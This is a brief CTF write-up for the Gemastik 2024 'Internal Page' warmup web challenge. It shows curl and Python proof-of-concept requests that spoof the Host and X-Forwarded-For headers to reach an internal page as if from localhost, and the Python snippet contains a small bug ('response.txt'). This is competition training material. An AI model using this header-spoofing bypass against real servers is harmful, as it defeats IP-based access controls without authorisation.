Warmup
Gemastik CTF 2024 (UNNES) warmup writeup.
1. Internal Page (Web - Easy)
1.1. Description
Basically, challenge ini seperti judulnya, yaitu pemanasan dengan melakukan request ke internal domain dari website challenge gemastik.
Dengan tambahan HTTP header
X-Forwarded-For, kita bisa memanipulasi request supaya bisa seolah-olah request dari localhost.
1.2. POC using cURL
curl -H "Host: internal.gemastik" -H "X-Forwarded-For: 127.0.0.1" ctf.gemastik.id:90051.3. POC using Python
#!/usr/local/python/3.13.1/bin/python3.13.1
import requests
URL: str = "http://ctf.gemastik.id:9005"
headers: dict = {"Host": "internal.gemastik.puspresnas.go.id", "X-Forwarded-For": "127.0.0.1"}
response: str = requests.get(URL, headers=headers)
status_code: int = response.status_code
if status_code == 200:
print(response.txt)
print(response.headers)
else:
print("Failed!")Other Warmup Challenges
All warmup challenges can be see at the following url:
https://oto.lv.tab.digital/s/sSwGJYxbYdrj3qN
Tags: #ctf, #web, #warmup
Last updated